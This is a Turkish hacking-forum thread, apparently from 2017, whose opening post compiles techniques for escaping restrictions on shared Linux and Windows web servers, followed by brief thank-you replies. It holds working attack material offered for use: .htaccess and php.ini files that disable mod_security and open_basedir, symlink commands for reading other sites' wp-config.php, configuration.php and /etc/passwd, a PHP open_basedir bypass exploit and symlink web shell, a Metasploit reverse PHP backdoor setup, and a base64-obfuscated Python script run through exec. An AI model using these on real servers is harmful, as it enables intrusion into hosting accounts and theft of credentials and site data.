Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2769
Mesaj Sayısı: 6325
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
19.09.2017 16:04
Konu Başlığı => Linux ve Windows Server [ Sunucu ] ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability ile Atlatma Teknikleri [ 19.09.2017 ]

Hazırlayan => KingSkrupellos - Cyberizm Digital Security Team

Tüm Hepsini Okumadan Önce Mutlaka Okumanız Gereken Makale =>

Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım

Hide Post


Konuyla ilgili BAZI Videolu Anlatımlar =>









































İçindekiler =>

1) - [ Bypass Directory ]-

2) Bypass Symlink with .htaccess

3) LiteSpeed Bypass [SymLink]

4) Litespeed Symlink 403 Forbidden Bypass

5) - [ Include symlink ]-

6) - [ Bypass Litespeed ] -

7) - [ ByPass OVH Hosting ]-

8) - [ Bypass Symlink 403 forbidden ] -

9) Bypass symlink via .htaccess 2016

10 ) ByPass Passwd in LiteSpeed Genel Mantık

11 ) Bypass Symlink (Priv8) Code

12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass

13 ) Server Bypass OVH & BlueHost Symlink Code 2014

14 ) Symlink Bypass 404

15) Internal Server Error ByPass Hatası ve Çözümü Kodu

16) Metasploit Bypass Backconnect & Get Domainowners

17 ) Server Bypass read and edit file with python script Work On (Linux,Win)

__________________________________________

- [ Bypass Directory ]-

Kod:
https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html

Bypass Symlink with .htaccess

Kod:
<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>

LiteSpeed Bypass [SymLink]

Kod:
OPTIONS  Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Litespeed Symlink 403 Forbidden Bypass

Kod:
python shell , CGI PERL Shell
and .htaccess
the htaccess code is
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
===============
what we should do ?
just open the cgi bypass shell
and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt


- [ Include symlink ]-

Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
DirectoryIndex new
DirectoryIndex config.ini

- [ Bypass Litespeed ] -

Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

- [ Bypass OVH ]-

Kod:
wew.shtml
do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php

- [ Bypass Symlink 403 forbidden ] -

Kod:
.htaccess
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root
php.ini
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
ln -s / CoderSec


Bypass symlink via .htaccess 2016

Kod:
.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any


ByPass Passwd in LiteSpeed Genel Mantık

Kod:
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Simple Bypass Internal Server Error Symlink 2016

Kod:
A good way to bypass forbidden error when reading passwd file
The general approach:


ln -s / etc / passwd passwd.txt

Well, open the passwd file The forbidden error encountered
for bypass=>

To bypass coming from one of the following two commands are used:
Code: (Select All)
ln -s /etc/passwd README
ln -s /etc/passwd HEADER
The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
SPT to b0x

Bypass Symlink (Priv8)
How you can bypass Symlink in linux webserver ?

1/ Create a folder

2/ Upload inside

".htaccess"
  
CODE:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

3/ Bypass manually

ln -s /home/user/public_html/t0ph4cking.txt

Bypass Symlink 403 Forbidden with .htaccess

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass

Kod:
Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php

Symlink Bypass 404

Kod:
<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
by KingSkrupellos - Cyberizm Digital Security Team

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img
src="http://www.cyberizm.org/"><P>This is exploit
from <a
href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
Lab - SecurityReason</a> labs.
Author : KingSkrupellos
<p>Script for legal use only.
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>More: <a href="http://cyberizm.org/">Cyberizm</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
"]).'" method="post"><input type="text" name="file" size="50"
value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
value="Create Symlink"></form>';

if(empty($file))
exit;

if(!is_writable("."))
die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

PHP Symbolic Link Open_Basedir Bypass Vulnerability

script1.php
<?
   symlink("a/a/a/a/a/a/", "dummy");
   symlink("dummy/../../../../../../etc/passwd", "xxx");
   unlink("dummy");
   while (1) {
        symlink(".", "dummy");
        unlink("dummy");
   }
?>

script2.php
<?
while (1) {
        print @file_get_contents("xxx");
}
?>


Server Bypass OVH & BlueHost Symlink Code 2014

Kod:
<? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
fwrite($anu,"ReadmeName x.txt");
echo'<a href=sl/x.txt>CHECK</a>';
}


Internal Server Error ByPass Hatası ve Çözümü Kodu

Kod:
".htaccess":

#Bypass By Cyberizm.Org
<DIRECTORY /..../user/..../>
OPTIONS Indexes ExecCGI FollowSymLinks
AllowOverride All
</DIRECTORY>
AddType txt .php
AddHandler txt .php


"php.ini":

#Bypass By Cyberizm.Org
safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON

Metasploit Bypass Backconnect & Get Domainowners

Kod:
Bazen serverde  cgi telnet shell derken internal server error diye gıcık bir hata alırsınız bunun çözüm yolu çok olmakla birlikte en garanti çözüm yolu cpanel girip  MiME types bölümüne gelip ilk satıra

application/x-httpd-cgi

yı yazmak daha sonra ikinci satıra cgi shelinizin uzantısını yazmak mesela ali.veli şeklindeyse cgi sheliniz ikinci satıra veli yazıp okeylemek sonra broswere grip o cgi shelein olduğu adresi yenilemek tabi bu arada bu yenileme işlemini yapmadan önce ali.veli şeklindeki cgi shelimize chmod 755 vermeyi unutmayacaz

Öncelikle Serverimize CGI atmadan once Perl Kodlarımızı Açıyoruz Ve en başta olan

#!/usr/bin/perl -I/usr/local/bandmain yazıyoruz ve Serverimize upload ediyoruz.

Eğerki serverde tekrar hata oluyorsaniz Web Shell CGİ Denemenizi isterim

http://archive.is/UT8xf Buyrun burada

.htaccess code :
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options +ExecCGI
AddHandler cgi-script cgi pl wasRewriteEngine on
RewriteRule (.*)\.was$ $1.was

Server Bypass read and edit file with python script Work On (Linux,Win)

Kod:
////////////////////SET UP BACKDOOR////////////////////
use payload/php/reverse_php
set LHOST [You Wan Ip] set LPORT 22
set ENCODER php/base64
generate -t raw

////////////////SET UP LISTENING/////////////////
use exploit/multi/handler
set LHOST [You Lan IP] set LPORT 22
set payload php/reverse_php
exploit

/////////////////// RUN BACKDOOR////////////////
php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
//////////////////CAT /ETC/PASSWD//////////////
cat /etc/passwd > passwd.txt
///////////////////CAT USER-DOMAIN/////////////
cat /etc/virtual/domainowners > domain.txt

Symlink 404 Not Found Script

Kod:
#!/usr/bin/python
#-------------------------------------------------------------------------------
# Author:     KingSkrupellos
# WebSite    Cyberizm.Org
#-------------------------------------------------------------------------------
import base64;
exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsL​mNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9I​HJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlI​HRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2luc​HV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb​3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0b​yB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZ​GluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgc​HJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0Z​Q0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlI​HRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpb​GUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ​1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZ​SAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNC​g0KI0RvbmUgQnkgT21hbnJvb3Q='))

İşlem Bu Kadar. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
(Bu konu en son: 19.09.2017 Tarihinde, Saat: 16:46 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: The_ZiziL , Dessy , Machscher1Turk , Aslan Bacanak
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimdışı
Seviye Puanı: 36
Yaşam Puanı: 880 / 880
Deneyim: 23 / 100
Rep Sayısı: 551
Mesaj Sayısı: 1899
Üyelik Tarihi: 06.02.2017
     
Yorum: #2
RE: Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
19.09.2017 16:05
Eline Sağlık King Süper Anlatmışsın Exciting

Allah’tan utanmayan insanlardan da utanmaz…
Alinti
Göktürk-X
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 8
Yaşam Puanı: 33 / 187
Deneyim: 51 / 100
Rep Sayısı: 6
Mesaj Sayısı: 91
Üyelik Tarihi: 16.07.2017
     
Yorum: #3
RE: Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
19.09.2017 16:06
eline sağlık abi
Alinti
Einstein
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 11
Yaşam Puanı: 84 / 256
Deneyim: 26 / 100
Rep Sayısı: 36
Mesaj Sayısı: 149
Üyelik Tarihi: 15.09.2017
     
Yorum: #4
RE: Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
20.09.2017 11:31
Eyvallah

Körler memleketinde görmek bir hastalık sayılır.
- Cenap Şahabettin
Alinti
ghost21
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 17
Yaşam Puanı: 232 / 408
Deneyim: 32 / 100
Rep Sayısı: 77
Mesaj Sayısı: 344
Üyelik Tarihi: 24.04.2017
     
Yorum: #5
RE: Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri
20.09.2017 13:36
cok güzel eline koluna saglık.

facebook.com/100016622081317
Alinti



1 Ziyaretçi